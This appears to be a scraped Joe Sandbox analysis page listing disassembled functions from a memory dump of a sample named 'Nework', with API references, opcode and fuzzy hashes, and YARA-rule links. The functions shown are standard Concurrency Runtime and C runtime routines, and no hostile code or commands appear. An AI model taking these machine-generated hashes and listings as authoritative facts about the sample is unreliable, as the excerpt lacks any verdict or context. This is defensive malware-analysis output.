Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C285B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 001C2903
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 001C2935

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: c978d21f51ea3cc1c09a8d207faa80bac600fd2050c97006fb6be3f6607adb9d
Instruction ID: 3b1ce146cd1fdf510e606f1a71020e521d313d498f6aa384fd84f2000560da5d
Opcode Fuzzy Hash: c978d21f51ea3cc1c09a8d207faa80bac600fd2050c97006fb6be3f6607adb9d
Instruction Fuzzy Hash: 03718730900259ABDF19CF94C981FBEBBB6AF65308F04409DEC41AB292C772DD16DB61

Function 001BE889 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE8D9

Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 001BE8F2
Concurrency::location::_Assign.LIBCMT ref: 001BE908
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 001BE975
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 001BE97D
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BE9A4
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 001BE9B0
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 001BE9E8
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BEA07
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 001BEA15
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 001BEA3C

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 3608406545-0
Opcode ID: 7170bce21199764a4a72120c48731c071d5e87052b2bf77b7b6bca8f47027d3c
Instruction ID: c0677ac5a32aaa20a0a4aa4aa5b4b40cf5c95b5192c3c8c07e32155db05ff52f
Opcode Fuzzy Hash: 7170bce21199764a4a72120c48731c071d5e87052b2bf77b7b6bca8f47027d3c
Instruction Fuzzy Hash: F4518D307002048FDB05EF64C4D6BED77A6AF99314F1940A9ED4A9F386CB70AD458BA2

Function 001B683A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B687F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B68B1
List.LIBCONCRT ref: 001B68EC
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B68FD
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B6919
List.LIBCONCRT ref: 001B6954
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B6965
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B6980
List.LIBCONCRT ref: 001B69BB
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001B69C8

Part of subcall function 001B5D3F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5D57
Part of subcall function 001B5D3F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5D69

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 714e70e89da75fb92dc04f0781964fcb316c0f8319f8b4382d02061f3e8abffc
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: FE515E75A00209AFDF08DF64C495BEDB7B9BF28304F4440A9E955AB282DB34AE05CB90

Function 001CA349 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001CA35F

Part of subcall function 001CABE5: HeapFree.KERNEL32(00000000,00000000,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?), ref: 001CABFB
Part of subcall function 001CABE5: GetLastError.KERNEL32(?,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?,?), ref: 001CAC0D

_free.LIBCMT ref: 001CA36B
_free.LIBCMT ref: 001CA376
_free.LIBCMT ref: 001CA381
_free.LIBCMT ref: 001CA38C
_free.LIBCMT ref: 001CA397
_free.LIBCMT ref: 001CA3A2
_free.LIBCMT ref: 001CA3AD
_free.LIBCMT ref: 001CA3B8
_free.LIBCMT ref: 001CA3C6

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7320d7865bb8e4aec17035820f420de6ab55ee019383c35e4ab3ec7ebca1e402
Instruction ID: f053856e452f87eb7ac4dae517bd4f2a2f089f5d8c3b8f603fe5360c93070c93
Opcode Fuzzy Hash: 7320d7865bb8e4aec17035820f420de6ab55ee019383c35e4ab3ec7ebca1e402
Instruction Fuzzy Hash: 7521AB7A90410CBFCB42EF94C985EDD7BB9BF28344F404169F6159B121DB31DA44CB81

Function 001B71C4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B7210
SwitchToThread.KERNEL32(?), ref: 001B7233
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 001B7252
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 001B726E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 001B7279
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B72A0

Strings

count, xrefs: 001B71DE
ppVirtualProcessorRoots, xrefs: 001B7298

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 158ea4d3696640fb42a2c7935f7af2f92348c40f5c7376fa476966676e4898a1
Instruction ID: b17cee8e6c294b52f3cdb575e6b286844a7506930a2bdcbc23544d51abd87e9d
Opcode Fuzzy Hash: 158ea4d3696640fb42a2c7935f7af2f92348c40f5c7376fa476966676e4898a1
Instruction Fuzzy Hash: 6A217134E04609AFCF14EF99C595AEDBBB5BF59350F1440A9E901AB391DB30AE41CF90

Function 001B6C7C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 001B6C96
GetCurrentProcess.KERNEL32 ref: 001B6C9E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 001B6CB3
SafeRWList.LIBCONCRT ref: 001B6CD3

Part of subcall function 001B4CCE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B4CDF
Part of subcall function 001B4CCE: List.LIBCMT ref: 001B4CE9

std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B6CE5
GetLastError.KERNEL32 ref: 001B6CF4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B6D0A

Strings

eventObject, xrefs: 001B6CDD

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: 586302e16ad16a7af2d325436426d108108ed7cc276700fc8eb284bf8bbc1242
Instruction ID: e283d2c9bba96e07c5ee4bd75b08178d3b5d078d3cdc2e20455dbf094980c138
Opcode Fuzzy Hash: 586302e16ad16a7af2d325436426d108108ed7cc276700fc8eb284bf8bbc1242
Instruction Fuzzy Hash: AE11E971500214EBDB14EBE4DD8AFEE37B8AF24750F204025F505EA0D2EBB4DA44CB60

Function 001D54C2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e372308c3553ec625dc53b4d7818465adab2752da869ce8d5756dc97c60fa6fb
Instruction ID: 833e428e37d491a025abaac4628506ffeb9d1874f1c2896ed4c2c60ba67ab8a8
Opcode Fuzzy Hash: e372308c3553ec625dc53b4d7818465adab2752da869ce8d5756dc97c60fa6fb
Instruction Fuzzy Hash: 20C11470E04685DFCB16CF98D881FAEBBB2BF59340F14405AE915AB392CB749941CF60

Function 001AC2B2 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001AC2DA
GetCurrentThreadId.KERNEL32 ref: 001AC2F7
GetCurrentThreadId.KERNEL32 ref: 001AC30C
_xtime_get.LIBCPMT ref: 001AC358
GetCurrentThreadId.KERNEL32 ref: 001AC38A
__Xtime_diff_to_millis2.LIBCPMT ref: 001AC3A2
_xtime_get.LIBCPMT ref: 001AC3C1
GetCurrentThreadId.KERNEL32 ref: 001AC3CB
GetCurrentThreadId.KERNEL32 ref: 001AC422

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: a94bfc6d393811552d0f38e825cec7ee3bef176248f6dc15a90f2848827b02e6
Instruction ID: 7f25c914041b80e758ee4f0af43f6e4255b62363d345cdaeadc7b418e1651eca
Opcode Fuzzy Hash: a94bfc6d393811552d0f38e825cec7ee3bef176248f6dc15a90f2848827b02e6
Instruction Fuzzy Hash: 81515879A00206CFCF15DF64C9D59AD77A0BF0A710B258069E8069F661DB30ED81CBA5

Function 001B7741 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B7763

Part of subcall function 001B5B18: __EH_prolog3_catch.LIBCMT ref: 001B5B1F
Part of subcall function 001B5B18: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B5B58

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 001B7771

Part of subcall function 001B677D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 001B67A2
Part of subcall function 001B677D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 001B67C5

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B778A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001B7796

Part of subcall function 001B5B18: RtlInterlockedPopEntrySList.NTDLL(?), ref: 001B5BA1
Part of subcall function 001B5B18: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 001B5BD0
Part of subcall function 001B5B18: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 001B5BDE

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 001B77E2
Concurrency::location::_Assign.LIBCMT ref: 001B7803
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 001B780B
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 001B781D
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 001B784D

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 7f1c7fff146c55dd0e7bddc35242d57fba26adedf0c592af0a5e22025d1d4375
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 01312530B0C2556FDF16AA78849A7FEBBB65F95300F0444A9D845DB2C2DB258D4AC3A1

Function 001C07E5 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001C07FB
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5B0E,?), ref: 001C080D
GetCurrentThread.KERNEL32 ref: 001C0815
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,001B5B0E,?), ref: 001C081D
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,001B5B0E,?), ref: 001C0836
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 001C0857

Part of subcall function 001B0071: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B008B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001B5B0E,?), ref: 001C0869
GetLastError.KERNEL32(?,?,?,?,?,001B5B0E,?), ref: 001C0894
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001C08AA

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 4971fe4651de635b47498bf4b49a3819013fdaf67ecd35b39735b0a6ce9004c6
Instruction ID: e2a085087d93edf99d173c775c0c53278efb833ab221188c96a099f27c4732f7
Opcode Fuzzy Hash: 4971fe4651de635b47498bf4b49a3819013fdaf67ecd35b39735b0a6ce9004c6
Instruction Fuzzy Hash: 6C11B475A40345EBD712ABB49D8AF9E3BA89F2D740F084039F945DE151EBB0C9808BB1

Function 001CE87E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001CE8A8
_free.LIBCMT ref: 001CE981
_free.LIBCMT ref: 001CE9AE

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 852c7affbd9bb5add62355c7e07e05e727d8292a2f4c866ce488cfcd390e1c91
Instruction ID: cc97f64882bf501eea967b102f55a2935f0dee7fb4ea6db1459b1f088fccb0ec
Opcode Fuzzy Hash: 852c7affbd9bb5add62355c7e07e05e727d8292a2f4c866ce488cfcd390e1c91
Instruction Fuzzy Hash: FC510171908346AFDB24AFB49882F6DBBE5FF31314B14416EE6119B282EB71CA41CB51

Function 001C46A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001C46D7
___except_validate_context_record.LIBVCRUNTIME ref: 001C46DF
_ValidateLocalCookies.LIBCMT ref: 001C4768
__IsNonwritableInCurrentImage.LIBCMT ref: 001C4793
_ValidateLocalCookies.LIBCMT ref: 001C47E8

Strings

csm, xrefs: 001C477D

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ebf76d3b34143125ef72ff24cb878093bf42775c7b0ec211c81f00b3ee703a45
Instruction ID: 5968e12114dc63c7a3caf6beef520daf9ba4efa2fd14f3d21d0736f0bf7a4b57
Opcode Fuzzy Hash: ebf76d3b34143125ef72ff24cb878093bf42775c7b0ec211c81f00b3ee703a45
Instruction Fuzzy Hash: 4F41F134A04308ABCF10DF68C894FAEBBB6BF66314F148159E8149B392C735EA51CF90

Function 001C1986 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C199F

Part of subcall function 001C1C6E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,001C16E7), ref: 001C1C7E

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 001C19B4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C19C3
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1A87

Strings

switchState, xrefs: 001C19BB
pContext, xrefs: 001C1A7F

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: 457dff11ede00aeced5a68220468a344c13f47865f036f2bd1287145649ce96c
Instruction ID: 4cec894c5e6472b4b545e8211a80ce972fcf2a9d6e7bb4a9f09451d76ab8a8c9
Opcode Fuzzy Hash: 457dff11ede00aeced5a68220468a344c13f47865f036f2bd1287145649ce96c
Instruction Fuzzy Hash: A731A135A40214ABCF05EF68C895F6D73B9BF66314F214569E811A7293DB70EE018A90

Function 001BE60F Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE637

Part of subcall function 001BE3A4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE3D7
Part of subcall function 001BE3A4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 001BE3F9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BE6B4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 001BE6C0
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE6CF
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE6D9
